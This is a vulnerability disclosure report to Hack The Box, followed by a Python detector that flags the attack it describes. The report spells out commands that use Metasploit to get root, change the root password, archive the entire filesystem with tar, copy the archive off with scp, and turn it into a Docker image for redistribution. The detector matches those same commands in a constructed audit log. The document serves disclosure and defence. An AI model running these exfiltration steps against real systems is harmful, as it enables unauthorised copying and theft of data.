Hack The Box - Vulnerability Report
Andrew Campi
05/20/22
Notice of Confidentiality: This document contains a discovered vulnerability that could, if used maliciously, cause harm to the company. The contents of this document are not to be shared or viewed by anyone besides the creator of this document and the intended recipients.
Executive Summary
Hack The Box is a platform in which security enthusiasts can learn hacking tools/methodologies through hands-on practice. The platform has a collection of virtual machines called boxes that have a hidden, intentional vulnerability. Each virtual machine contains a flag that is found in a directory that only a root user can access. Therefore, the user of the platform completes the box when they have root access to the machine. This is inherently very dangerous. Without any security restrictions in place, a user at this level can do anything they desire with the machine.
To access its full library of boxes, Hack The Box charges a recurring fee. Hack The Box’s boxes are therefore valuable assets and must remain secure so that they cannot be stolen. In Hack The Box’s current state of security, Andrew Campi discovered that a malicious person wanting to steal these boxes has the ability to do so. This vulnerability exists because, once the user of the platform becomes root, they have unrestricted access to the machine.
Andrew Campi discovered this vulnerability specifically on Linux boxes, which comprise the majority of Hack The Box’s paid-for boxes. Once a malicious person roots a box, they can generate a backup tarball of the essential parts of the file system. After changing the password of the machine, the malicious person can then send themselves the backup via SSH. They can then import the backup as a Docker image, and post it to Docker Hub for all to download and use for free.
This vulnerability currently affects all Linux based boxes on Hack The Box’s platform, making it a severe vulnerability. With slight modification to the method described in this report, this vulnerability is likely to exist in Windows boxes as well.
In order to secure these assets, it is recommended that Hack The Box either implement proper restrictions on rooted boxes or create an alert system that fires when files are transferred off a box.
Notice of Intent: Andrew Campi’s only intent is to improve the security posture of Hack The Box. He has absolutely no malicious intent. Andrew will not exploit these vulnerabilities, nor will he publicly expose them. All Hack The Box assets acquired in the included demonstration have been permanently deleted.
Discovered Vulnerability
The following vulnerability is specific to Linux boxes. Slight modifications to the following commands are likely to expose the same vulnerability on all Windows boxes. The vulnerability is rated based on the likelihood that it could cause damage when used.
Forbidden Data Extraction
Severity: Critical
For Linux boxes on the platform, the file system can be extracted. This enables a malicious person to create a Docker image of the box that can be mass distributed for free on Docker Hub.
The following sections use the Lame box as an example. In this example, the target IP address of the box is 10.10.10.3. Substitute the IP address of the desired Linux box on the Hack The Box platform to reproduce the steps there.
Steps to Reproduce:
- Connect to Hack The Box’s VPN via OpenVPN.
- Turn on the Lame box.
- Obtain a root shell on the box. This can be achieved by successful exploitation following an official walkthrough. In this example, the Lame box is rooted using the Metasploit “usermap_script” module. Take note that the exploited ports are 139 and 445. Also, take note that the vulnerable service is Samba.
- (On the Lame box as root via Metasploit) Change the password to “hackthebox”.
    root@lame:/# passwd
    Enter new UNIX password: hackthebox
    Retype new UNIX password: hackthebox
- Exit the Metasploit shell.
- (On the attack box) Connect via SSH.
    kali@kali $ ssh root@10.10.10.3
If an error occurs stating that “ssh-dss” is required, use the following command.
    kali@kali $ ssh -oHostKeyAlgorithms=+ssh-dss root@10.10.10.3
- (On the Lame box as root via SSH) Generate the backup tarball with defined exclusions.
    root@lame:~# tar -vcpzf backup.tar.gz --exclude=/proc --exclude=/tmp --exclude=/mnt --exclude=/dev --exclude=/sys --exclude=/media /
- Exit SSH.
- (On the attack box) Copy the backup tarball off the Lame box onto the attack box.
    kali@kali $ scp root@10.10.10.3:/backup.tar.gz /home/kali/Desktop/backups
- Change directory to the copied backup tarball (/home/kali/Desktop/backups)
- Grant full permissions to the backup tarball.
    kali@kali $ sudo chmod 777 backup.tar.gz
- (After installing Docker or confirming that it is installed on the attack box) Create a Docker image from the backup tarball. It will be named “lame” with the tag “latest”.
    kali@kali $ sudo docker import backup.tar.gz lame:latest
This Docker image can now be pushed to Docker Hub for public download. The following steps demonstrate how to use this Docker image and how to exploit it in the same way as the authentic Lame box.
- Create a Docker container from the image.
    kali@kali $ sudo docker run -dit -p 139:139 -p 445:445 --name=lame lame bash
The Docker container has now opened ports 139 and 445 on the attack box. However, the vulnerable service is not running yet. A service version scan using Nmap on these ports will return “tcpwrapped”.
- Generate a root shell on the container.
    kali@kali $ sudo docker exec -it lame bash
- (On the Lame docker container as root) List all services available. Skip this step if the name of the vulnerable service is already known.
    root@c2d777ac091b:/# ls -al /etc/init.d/
- (On the Lame docker container as root) Start the Samba service.
    root@c2d777ac091b:/# service samba start
- Exit the Lame Docker container.
- (On the attack box) Perform the exact same exploit (Metasploit “usermap_script”), this time setting RHOST to 127.0.0.1 and LHOST to eth0.
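The reproduction steps above, together with the recommendation in the Executive Summary that Hack The Box alert when files are transferred off a box, show what such an alert would have to key on: a root password change, a tar archive whose member is the filesystem root, and an outbound copy of that archive shortly afterwards. The Python script below is an added example written for this report, not code from Hack The Box or from the author. It parses auditd-style EXECVE records (the embedded sample log is constructed to mirror the command sequence in this report, not a real capture), applies one rule per command, and then correlates the archive creation with the later copy-out. The log format, the rule names and the 600-second correlation window are assumptions about how a defender might instrument a box; they do not describe any existing Hack The Box control.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample of auditd EXECVE records mirroring the command sequence in
# this report (not a real capture). Real auditd emits argv as a0..aN fields;
# values containing spaces are hex-encoded, which this simplified parser skips.
SAMPLE_AUDIT_LOG = """\
type=EXECVE msg=audit(1653000100.101:201): argc=1 a0="id"
type=EXECVE msg=audit(1653000130.250:202): argc=1 a0="passwd"
type=EXECVE msg=audit(1653000200.010:203): argc=9 a0="tar" a1="-vcpzf" a2="backup.tar.gz" a3="--exclude=/proc" a4="--exclude=/tmp" a5="--exclude=/mnt" a6="--exclude=/dev" a7="--exclude=/sys" a8="/"
type=EXECVE msg=audit(1653000260.500:204): argc=4 a0="tar" a1="-czf" a2="logs.tar.gz" a3="/var/log"
type=EXECVE msg=audit(1653000300.700:205): argc=3 a0="scp" a1="-f" a2="/backup.tar.gz"
"""

RECORD_RE = re.compile(r'type=EXECVE msg=audit\((?P<ts>\d+\.\d+):\d+\):(?P<rest>.*)')
ARG_RE = re.compile(r'a(\d+)="([^"]*)"')
ARCHIVE_SUFFIXES = (".tar", ".tar.gz", ".tgz", ".tar.bz2", ".tar.xz")


@dataclass
class Event:
    ts: float
    argv: List[str]


@dataclass
class Finding:
    ts: float
    kind: str
    detail: str


def parse_execve(log_text: str) -> List[Event]:
    """Turn EXECVE records into (timestamp, argv) events, ignoring other record types."""
    events = []
    for line in log_text.splitlines():
        m = RECORD_RE.match(line)
        if not m:
            continue
        args = sorted((int(i), v) for i, v in ARG_RE.findall(m.group("rest")))
        events.append(Event(float(m.group("ts")), [v for _, v in args]))
    return events


def tar_archives_root(argv: List[str]) -> bool:
    """True when tar is creating an archive and '/' itself is one of the members."""
    if len(argv) < 3 or argv[0].rsplit("/", 1)[-1] != "tar":
        return False
    mode = argv[1]
    if mode.startswith("--"):
        creating = mode == "--create"
    else:
        creating = "c" in mode.lstrip("-")   # short mode letters, e.g. -vcpzf or cf
    members = [a for a in argv[2:] if not a.startswith("-")]
    return creating and "/" in members


def classify(event: Event) -> Optional[Finding]:
    """Map one execve to a finding, or None if the command is not interesting."""
    argv = event.argv
    if not argv:
        return None
    cmd = argv[0].rsplit("/", 1)[-1]
    if cmd == "tar" and tar_archives_root(argv):
        return Finding(event.ts, "filesystem_archive", " ".join(argv))
    if cmd == "scp" and "-f" in argv:
        # With the legacy scp protocol the remote side runs `scp -f <path>` to send a file out.
        paths = [a for a in argv[1:] if not a.startswith("-")]
        kind = "archive" if any(p.endswith(ARCHIVE_SUFFIXES) for p in paths) else "file"
        return Finding(event.ts, "outbound_copy_" + kind, " ".join(paths))
    if cmd == "passwd" and len(argv) == 1:
        # passwd with no target user: the caller is changing its own password (root here).
        return Finding(event.ts, "own_password_change", "passwd")
    return None


def detect(log_text: str, chain_window_s: float = 600.0) -> List[Finding]:
    """Run the per-event rules, then correlate archive creation with a later copy-out."""
    findings = [f for f in map(classify, parse_execve(log_text)) if f is not None]
    archives = [f for f in findings if f.kind == "filesystem_archive"]
    chains = []
    for copy in findings:
        if copy.kind != "outbound_copy_archive":
            continue
        for arc in archives:
            if 0 <= copy.ts - arc.ts <= chain_window_s:
                chains.append(Finding(copy.ts, "exfiltration_chain",
                                      f"archive of / at {arc.ts:.0f}, copied out at {copy.ts:.0f}"))
                break
    return findings + chains


if __name__ == "__main__":
    for f in detect(SAMPLE_AUDIT_LOG):
        print(f"{f.ts:.3f} {f.kind}: {f.detail}")
```

On the sample log the routine tar of /var/log and the harmless `id` produce nothing, while the password change, the archive of `/`, the scp of a tarball and the archive-then-copy chain are each reported. When OpenSSH uses its SFTP mode for scp, the remote side runs `sftp-server` instead of `scp -f`, so a production rule would also need to watch that binary or the SSH session's file reads; the point of the correlation step is that an alert on the chain is far less noisy than an alert on any single tar or scp.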